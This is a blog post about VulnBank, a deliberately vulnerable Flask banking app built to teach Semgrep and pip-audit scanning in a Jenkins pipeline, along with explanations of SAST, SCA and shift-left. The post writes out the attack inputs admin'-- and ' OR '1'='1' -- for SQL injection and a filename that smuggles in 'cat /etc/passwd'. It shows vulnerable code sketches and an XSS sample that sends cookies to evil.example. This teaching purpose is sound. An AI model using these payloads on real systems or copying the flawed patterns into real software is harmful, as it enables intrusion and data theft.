How I Built a Deliberately Vulnerable Banking App to Demonstrate Automated Security Scanning with Semgrep and Jenkins
Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run themselves.
I built VulnBank: a deliberately vulnerable Flask banking application, wired up to a Jenkins CI/CD pipeline with Semgrep scanning at every stage. The goal was simple — show what automated security scanning actually looks like in practice, what it catches, and where its limits are.
The full project is available here: https://github.com/PrakyathReddy/VulnBank-Semgrep
THE CORE IDEA
Functional correctness and security correctness are not the same thing.
A banking app can transfer money correctly, authenticate users correctly, and render pages correctly — and still be completely compromised by an attacker in under five minutes.
The demo makes this concrete. Every unit test passes. The app works exactly as intended. And yet Semgrep finds four blocking vulnerabilities the moment it scans the code.
That moment — tests green, Semgrep red, pipeline blocked — is the entire point.
WHAT'S IN THE APP
VulnBank is a minimal Flask app with six features, each containing an intentional vulnerability:
SQL Injection — Login Page
The login form concatenates user input directly into a SQL query string. An attacker can enter the username:
admin'--
and bypass the password check entirely. The double-dash comments out the rest of the query. No password needed. Logged in as admin.
This is one of the oldest and most common vulnerabilities in web applications. It's also one of the easiest to fix — parameterized queries solve it completely. But under deadline pressure, developers reach for f-strings, and this is what happens.
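The vulnerable pattern can be reproduced in a few lines (a hypothetical sketch with an in-memory SQLite table, not VulnBank's exact code):

```python
import sqlite3

# Hypothetical sketch of the vulnerable pattern (an in-memory table stands
# in for the real database; not VulnBank's exact code).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

def login_vulnerable(username, password):
    # The bug: user input is interpolated straight into the SQL string.
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None

# The double-dash comments out the password check entirely.
print(login_vulnerable("admin'--", "anything"))   # True: no password needed
print(login_vulnerable("admin", "wrong"))         # False: normal check still applies
```

The `admin'--` payload closes the username string, and everything after the double-dash, including the entire password clause, is discarded as a comment.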
IDOR — Account Viewer
After logging in, your account is at /account/1. If you change that number to /account/2, you see someone else's account. /account/3 shows another. There is no ownership check anywhere in the code — the app verifies you are logged in, but never verifies the account belongs to you.
This is an Insecure Direct Object Reference (IDOR). It's consistently in the OWASP Top 10 because it's so common and so easy to miss in code review.
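The flaw is easy to sketch without Flask at all (illustrative data and function names, not the app's real code):

```python
# The IDOR in miniature, independent of Flask (illustrative data and names).
ACCOUNTS = {
    1: {"owner": "alice", "balance": 500},
    2: {"owner": "bob", "balance": 900},
}

def view_account_vulnerable(account_id, logged_in_user):
    # Authentication only: checks that *someone* is logged in.
    if logged_in_user is None:
        raise PermissionError("login required")
    return ACCOUNTS[account_id]           # alice can read bob's account

def view_account_fixed(account_id, logged_in_user):
    account = ACCOUNTS.get(account_id)
    # Authorisation: the resource must belong to the authenticated user.
    if account is None or account["owner"] != logged_in_user:
        raise PermissionError("not your account")
    return account

print(view_account_vulnerable(2, "alice"))   # bob's data leaks to alice
```

The fix is one extra condition, but it has to exist on every resource lookup, which is exactly why IDOR slips through code review.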
Command Injection — File Upload
The file upload feature runs a shell command to inspect the uploaded file. The filename comes from the user and goes directly into that shell command with shell=True. An attacker uploads a file named:
photo.jpg; cat /etc/passwd
The shell executes both commands. The server's password file is returned.
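The same behaviour can be demonstrated harmlessly, with echo standing in for the real file-inspection command (an illustrative sketch, not the app's actual handler):

```python
import subprocess

# Harmless demonstration: "echo" stands in for the real file-inspection
# command, but the shell behaviour is identical.
filename = "photo.jpg; echo INJECTED"   # attacker-controlled upload name

# shell=True hands the whole string to /bin/sh, so the semicolon ends the
# first command and starts a second one.
result = subprocess.run(f"echo inspecting {filename}",
                        shell=True, capture_output=True, text=True)
print(result.stdout)
# inspecting photo.jpg
# INJECTED
```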
Hardcoded Secrets
The Flask secret key, admin credentials, and AWS keys are all hardcoded directly in app.py:
app.secret_key = "supersecretkey123"
ADMIN_PASSWORD = "admin123"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
Anyone with repository access has these credentials. In a public repo, that means everyone.
Weak Cryptography — Password Reset
Password reset tokens are generated using MD5 of the username. MD5 is cryptographically broken. The token for any user is deterministic and precomputable. An attacker who knows your username can generate your reset token without ever interacting with the server.
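A short sketch makes the difference concrete (illustrative function names; the app's real code differs):

```python
import hashlib
import secrets

# The flaw in miniature: an MD5-of-username token is deterministic, so
# anyone who knows the username can precompute it offline.
def weak_reset_token(username):
    return hashlib.md5(username.encode()).hexdigest()

print(weak_reset_token("alice"))                     # same 32 hex chars, every time

# A sound token is random, unguessable, and generated fresh per request
# (it must also be stored server-side with an expiry).
def strong_reset_token():
    return secrets.token_urlsafe(32)                 # 256 bits from the OS CSPRNG

print(strong_reset_token() == strong_reset_token())  # False: never repeats in practice
```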
Vulnerable Dependencies
requirements.txt pins requests to version 2.18.0, which carries multiple known CVEs including credential exposure via HTTP redirects. The app also pins an old version of Flask with a known advisory.
THE JENKINS PIPELINE
The pipeline has six stages. Each one builds on the last:
Stage 1 — Checkout: Jenkins pulls the latest code from the GitHub repository. Nothing runs until the code is local.
Stage 2 — Install: Sets up a Python virtual environment, installs application dependencies, and installs Semgrep and pip-audit.
Stage 3 — Semgrep SAST: Runs Semgrep against the application code with --config auto. Semgrep loads rules appropriate for the detected language (Python/Flask) and scans every file. This is where SQL injection, command injection, and NaN injection are caught.
Stage 4 — Semgrep Secrets: Runs Semgrep with the p/secrets ruleset against the entire repository. Designed to catch hardcoded API keys, tokens, and credentials.
Stage 5 — SCA with pip-audit: Runs pip-audit against requirements.txt. This stage reads every pinned dependency, queries vulnerability databases, and reports every known CVE. This is where the 17 vulnerabilities across four packages surface.
Stage 6 — Security Gate: Evaluates whether any prior stage failed. If anything failed, the gate blocks deployment with a clear message. The deploy stage never runs.
WHAT SEMGREP ACTUALLY FOUND
Running 128 rules across 17 files, Semgrep reported four blocking findings:
Finding 1: SQL Injection (Django rule). File: app.py, line 113. User input concatenated directly into a raw SQL query string.
Finding 2: SQL Injection (Flask-specific rule). File: app.py, line 113. Same line, flagged by a Flask-specific rule as well. Two different rule authors caught the same issue independently — which adds confidence.
Finding 3: NaN Injection. File: app.py, line 175. User input passed directly into float(). An attacker can pass the string "nan", which Python casts to float NaN, causing undefined comparison behavior downstream. This one was not intentionally planted — Semgrep found it anyway.
Finding 4: subprocess with shell=True. File: app.py, line 228. subprocess.run called with shell=True and user-controlled input. The command injection vulnerability.
Scan summary: 4 findings, 4 blocking, 128 rules run, 17 files scanned.
The command injection was caught. The SQL injection was caught twice. A bonus vulnerability nobody planted was found. The pipeline failed. Deploy was blocked.
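The NaN finding is worth reproducing in isolation, because it looks so innocuous. The sketch below (with a hypothetical parse_amount validator) shows why it matters:

```python
import math

# float() happily parses the string "nan", and NaN poisons every comparison.
amount = float("nan")
print(amount > 0, amount < 0, amount == amount)   # False False False

# Any check like `if amount <= balance` behaves surprisingly with NaN.
# Validate before converting (parse_amount is a hypothetical helper):
def parse_amount(text):
    value = float(text)
    if not math.isfinite(value):          # rejects nan, inf, and -inf
        raise ValueError("amount must be a finite number")
    return value

print(parse_amount("25.00"))              # 25.0
```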
What Semgrep Did Not Catch
Hardcoded secrets: the generic strings like "supersecretkey123" and "admin123" did not match any pattern in the p/secrets ruleset. Semgrep's secrets rules are designed around recognisable formats: AWS key patterns that start with AKIA, GitHub tokens that start with ghp_, JWTs, private keys. A generic password assignment doesn't trigger them.
This is not a bug — it's a design decision. Flagging every string assignment would create overwhelming noise. But it means generic hardcoded credentials require either a paid tier with more rules, or custom rules written for your specific codebase.
IDOR was not caught either. IDOR is a logic flaw, not a code pattern. Semgrep can't know that your business rules require an ownership check on every account query — only you know that. This is exactly the use case for custom rules, which the project also includes.
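A custom rule for this codebase's generic secrets might look roughly like this (a sketch of Semgrep's rule format; the repository's actual rules may differ):

```yaml
rules:
  - id: hardcoded-flask-secret-key
    patterns:
      - pattern: app.secret_key = "..."   # "..." matches any string literal
    message: Flask secret_key is hardcoded; load it from the environment instead.
    languages: [python]
    severity: ERROR
```

Run with semgrep --config pointed at the rule file, this flags any string literal assigned to app.secret_key, regardless of how unremarkable the string looks.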
SCA: WHERE THE REAL NOISE IS
pip-audit found 17 vulnerabilities across four packages: flask, requests, idna, and urllib3. This is what happens when you pin old dependency versions and never update them.
The requests package alone, at version 2.18.0, carries four separate CVEs with fix versions ranging from 2.20.0 to 2.32.4; urllib3 at 1.21.1 accounts for most of the remaining findings.
This is typical of real codebases. The application code might be relatively clean. The 99% of the codebase you didn't write — the dependencies — is often carrying years of unpatched vulnerabilities.
The SCA stage failed, which triggered the security gate, which blocked the deploy. This is the correct behavior.
THE SECURITY GATE
The security gate is the stage that makes everything meaningful. Without it, findings are advisory. Developers can see them, acknowledge them, and deploy anyway.
With a security gate:
Stage "Security gate" skipped due to earlier failure(s)
SECURITY GATE FAILED — deployment blocked. Fix all findings before merging.
Finished: FAILURE
The gate makes security non-negotiable. It enforces the shift-left philosophy not through culture or process, but through automation. Vulnerable code simply cannot reach production.
WHAT THIS DEMONSTRATES
After building and running this project end to end, a few things became very concrete:
Passing tests are not a security signal. All unit tests in the project pass. The app is functionally correct. The security failures are invisible to functional testing.
Speed matters. Semgrep scanned 17 files with 128 rules and returned results in seconds. A developer gets this feedback while they still have context about the code they just wrote.
Tools have limits. Semgrep missed the hardcoded secrets because they're generic strings. It missed the IDOR because it's a logic flaw. No tool catches everything. Understanding what a tool misses is as important as understanding what it catches.
Custom rules fill the gaps. The project includes custom Semgrep rules for IDOR detection and Flask-specific secret patterns. These are rules no public ruleset would ever have — because they're specific to this codebase's patterns. This is where the real depth of Semgrep becomes apparent.
SCA is often noisier than SAST. Four packages, seventeen vulnerabilities. Most of them are in transitive dependencies — packages you didn't choose, pulled in by packages you did choose. Managing this noise, distinguishing reachable from unreachable vulnerabilities, is where SCA tooling is still maturing.
CONCEPTS EXPLAINED
If some of the terminology in this post was unfamiliar, here is a plain-language breakdown of the key concepts behind what Semgrep does and why it works.
SAST — Static Application Security Testing
SAST analyses source code without executing the program. It reads your code as a structure and looks for patterns that indicate vulnerabilities — both known ones and potential ones.
The attacks SAST catches form a specific class: ones that require no modification of the source code at all. They arrive entirely through inputs the app itself asks for. A customer with malicious intent provides something unexpected, and the app handles it unsafely.
SQL Injection is the classic example. When an app asks for your name to look up your account, most users type their name. A malicious user types something like ' OR '1'='1' -- instead. The app takes that input and builds a SQL query from it. The attacker's input breaks out of the data context and becomes part of the query itself — extending it, modifying it, or bypassing it entirely. The impact ranges from reading data that should be private to corrupting the database to executing OS commands on the server. The fix is simple in principle: never treat input as an instruction. Use parameterized queries — placeholders such as ? or %s, with the values bound separately by the database driver — which make it structurally impossible for input to escape the data context and become part of the command.
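Here is what the parameterized form looks like in practice (a minimal sketch using Python's built-in sqlite3 driver, where the placeholder is ?):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

def login_safe(username, password):
    # The ? placeholders keep input in the data plane: the driver sends the
    # query shape and the values separately, so input can never become SQL.
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

print(login_safe("' OR '1'='1' --", "anything"))  # False: payload is just an odd username
print(login_safe("admin", "hunter2"))             # True: normal login still works
```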
Command Injection works the same way at the OS level. The app accepts input and passes it to a shell command. A malicious user appends a semicolon and a second command. The shell runs both. The attacker now has the ability to run arbitrary commands on the backend server — delete files, exfiltrate data, install backdoors. The fix is to never pass user input directly to a shell. Use subprocess with a list of arguments and shell=False. Each argument is treated as a whole string and never parsed by the shell.
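A minimal sketch of the safe form, with echo standing in for the real command:

```python
import subprocess

filename = "photo.jpg; cat /etc/passwd"   # the hostile upload name from earlier

# With an argument list and shell=False (the default), no shell ever parses
# the string: the whole filename arrives as one literal argument.
safe_run = subprocess.run(["echo", "inspecting", filename],
                          capture_output=True, text=True)
print(safe_run.stdout)   # one line; the semicolon is just a character
```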
XSS — Cross Site Scripting — operates at the browser level rather than the server. When you log into a website, your browser downloads and executes that site's JavaScript. The site also gives you a cookie — a small token that identifies you so you don't have to log in on every page. JavaScript running on a page has access to those cookies, your session data, local storage, and the entire page content. If an attacker can inject a malicious script into a page — through an input field that isn't sanitized — your browser pulls that script down along with the legitimate code and executes it. The attacker's script can forward your cookies to their own server, log every keystroke, replace the entire page with a fake login form, or make network requests using your identity. The fix is to always treat user input as text, never as HTML. Before rendering any user-provided content back into a page, escape all HTML characters. The second line of defence is a Content Security Policy header — even if a script somehow gets in, the CSP header tells the browser only to execute scripts from verified, authorised sources.
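The escaping defence is one function call in Python (a minimal illustration using the standard library's html module; the CSP value is illustrative):

```python
import html

# An attacker-supplied comment containing a script payload.
comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Escaped, the payload is inert text: the browser renders it, never runs it.
escaped = html.escape(comment)
print(escaped)

# Second layer of defence: a Content-Security-Policy header telling the
# browser to execute scripts only from the site's own origin (illustrative).
csp_header = ("Content-Security-Policy", "script-src 'self'")
```

Template engines like Jinja2 apply this escaping automatically, which is why XSS in Flask apps usually traces back to someone explicitly disabling it.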
How SAST Works Internally
To do any of this, SAST tools need to actually understand code rather than just search text. The pipeline looks like this:
Source code is parsed into an AST — an Abstract Syntax Tree. This is the source code broken apart into a tree of operators, assignments, function calls, and conditions that the tool can reason about structurally. Unlike raw text search, the AST represents what the code means, not just what it says.
Control flow analysis maps all the paths the code can take — branches, loops, function calls. Code rarely runs straight from top to bottom. It splits based on conditions, repeats in loops, jumps to functions and returns. SAST builds a map of every possible execution path.
Taint tracking then follows untrusted data — input from a user — along every one of those paths. The data enters at a source (a form field, a URL parameter, a cookie). The tool traces every variable it touches, every function it passes through, every transformation applied to it. If it reaches a sink — a database query, a shell command, a rendered HTML page — without being sanitized first, that path is a vulnerability. The finding is reported with the exact file and line number where the taint reaches the sink.
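These three steps can be compressed into a toy analyser (heavily simplified, with input() as the only source and os.system() as the only sink; real tools handle vastly more cases):

```python
import ast

# Toy static taint analysis: input() is the source, os.system() is the sink,
# and taint propagates through simple name-to-name assignments.
SOURCE_CODE = '''
name = input()
alias = name
os.system(alias)
safe = "constant"
os.system(safe)
'''

tree = ast.parse(SOURCE_CODE)
tainted = set()
findings = []

for node in tree.body:
    # Assignment: mark the target if the right-hand side carries taint.
    if isinstance(node, ast.Assign) and isinstance(node.targets[0], ast.Name):
        target, value = node.targets[0].id, node.value
        if (isinstance(value, ast.Call) and isinstance(value.func, ast.Name)
                and value.func.id == "input"):
            tainted.add(target)                 # taint enters at the source
        elif isinstance(value, ast.Name) and value.id in tainted:
            tainted.add(target)                 # taint propagates
    # Bare call statement: flag tainted data reaching the sink.
    if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
        call = node.value
        if (isinstance(call.func, ast.Attribute) and call.func.attr == "system"
                and call.args and isinstance(call.args[0], ast.Name)
                and call.args[0].id in tainted):
            findings.append(f"tainted data reaches os.system at line {call.lineno}")

print(findings)   # one finding, for the os.system(alias) call
```

Note that the taint survives the alias = name hop, while the constant-fed call is never flagged: that is the source-to-sink path tracing in miniature.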
SCA — Software Composition Analysis
Modern applications are mostly code other people wrote. Your dependencies — the packages in requirements.txt, package.json, pom.xml — can easily represent 99% of what's actually running. SCA is focused entirely on that layer.
SCA reads your manifest files, resolves the full dependency tree including transitive dependencies (packages your packages depend on), and checks every package and version against large databases of known vulnerabilities. Each known vulnerability has a CVE identifier, a severity score, affected versions, and a fixed version.
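In miniature, the lookup works like this (the advisory entry below is a placeholder, not real CVE data):

```python
# Toy sketch of the SCA lookup: parse pinned requirements and check each
# (name, version) pair against a vulnerability database. The advisory
# below is a placeholder entry, not real CVE data.
REQUIREMENTS = "requests==2.18.0\n"

ADVISORIES = {
    ("requests", "2.18.0"): [
        "EXAMPLE-CVE-0001: credential exposure via HTTP redirect",
    ],
}

def audit(requirements_text):
    findings = []
    for line in requirements_text.splitlines():
        if not line.strip():
            continue
        name, _, version = line.partition("==")
        findings.extend(ADVISORIES.get((name.strip(), version.strip()), []))
    return findings

print(audit(REQUIREMENTS))   # the pinned requests version surfaces its advisory
```

Real tools like pip-audit do the same thing against live databases such as the Python Packaging Advisory Database, after resolving the full transitive tree rather than just the top-level pins.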
SCA tools also check license types across the dependency tree — a GPL-licensed package in a commercial product can create legal exposure that has nothing to do with security. And SCA tools generate SBOMs — Software Bills of Materials — a machine-readable inventory of every component in your software with its version, license, and source. When a critical CVE drops, an SBOM lets you query instantly whether your product is affected, rather than manually checking every codebase.
Secrets Scanning
Credentials, API keys, tokens, and private keys accidentally committed to source code are one of the most common causes of breaches. Secrets scanning detects these by pattern matching against known formats — AWS keys follow a specific pattern, GitHub tokens have a recognisable prefix, private keys have a standard header — and by entropy analysis, flagging strings that are long and random-looking enough to be a real credential.
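Both strategies fit in a few lines (a sketch; real scanners use far richer pattern sets and entropy models):

```python
import math
import re

# Two detection strategies in miniature: a known-format pattern (AWS access
# key IDs start with AKIA) plus Shannon entropy for random-looking strings.
AWS_KEY = re.compile(r"AKIA[0-9A-Z]{16}")

def shannon_entropy(s):
    # Bits per character: higher means more random-looking.
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def looks_like_secret(s, min_len=20, min_entropy=3.5):
    if AWS_KEY.search(s):
        return True                       # matches a known credential format
    return len(s) >= min_len and shannon_entropy(s) >= min_entropy

print(looks_like_secret("AKIAIOSFODNN7EXAMPLE"))  # True: matches the AWS pattern
print(looks_like_secret("supersecretkey123"))     # False: short and low-entropy
```

The second print is the whole story of this project's missed finding: a human-chosen password sails under both detectors.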
The limitation, as this project discovered firsthand, is that generic strings like "admin123" or "supersecretkey123" don't match known patterns and have low entropy. They require custom rules written for your specific codebase.
Shift-Left
The software delivery lifecycle runs roughly: Design, Code, Build, Test, Staging, Release, Production. Traditionally, security checkpoints lived near the right end of that line — pre-production reviews, penetration testing before release, security audits on finished software.
The shift-left philosophy moves security as far left as possible — ideally to the moment a developer writes the code. The reasoning is economic as much as technical: a vulnerability caught while the developer is still writing the code takes minutes to fix. The same vulnerability caught in a pre-production audit takes days. Caught in production after an incident, it can take weeks and cost significantly more in remediation, reputation, and regulatory exposure.
Semgrep is built for the left side of that line. It runs in seconds, integrates into CI/CD pipelines, and surfaces findings as inline comments on pull requests while the developer still has context. Checkmarx, by contrast, is built more toward the middle and right — deep comprehensive scans run nightly or weekly, reviewed by dedicated security teams, used for compliance reporting and formal sign-off.
Neither replaces the other. Semgrep catches the majority of issues fast and cheaply. Deeper tools catch the subtle cross-file flows and complex logic that fast scanners miss. A mature security program uses both.
IDOR — Insecure Direct Object Reference
Think of it this way: you are authorised to borrow a book from the library. But the librarian doesn't check which book — they just let you in. You can now take any book, or all of them.
In web applications, this means the app checks that you are logged in but never checks whether the specific resource you are requesting belongs to you. Your account is at /account/1. An attacker changes the URL to /account/2 and sees someone else's account. The app authenticated the user correctly. It never authorised which data that user is allowed to see. The fix is a single additional condition in the database query — fetch this account only if it belongs to the currently authenticated user.
RUNNING IT YOURSELF
Everything is in the repository. You need Docker, Python 3, and a free Semgrep account.
git clone https://github.com/PrakyathReddy/VulnBank-Semgrep
cd VulnBank-Semgrep
pip install -r requirements.txt
python app.py
The app runs on localhost:5000. Demo credentials are in the README.
For the Jenkins pipeline, the README includes the exact Docker commands to get Jenkins running and connected to the repo.
Full project: https://github.com/PrakyathReddy/VulnBank-Semgrep
CLOSING THOUGHT
Security tooling only works if developers trust it and act on it. A tool that takes two hours to scan and produces eight hundred findings will be ignored. A tool that takes thirty seconds, produces four precise findings with line numbers and fix suggestions, and blocks the build — that gets fixed.
The shift-left movement is not really about tools. It is about putting security feedback at the moment when a developer can most easily act on it: while they are still thinking about that code, before the PR is merged, before the deploy happens.
VulnBank makes that concrete. The code is bad, the tests pass, the pipeline catches it, the deploy is blocked. That sequence — visible, automated, fast — is what good security tooling looks like in practice.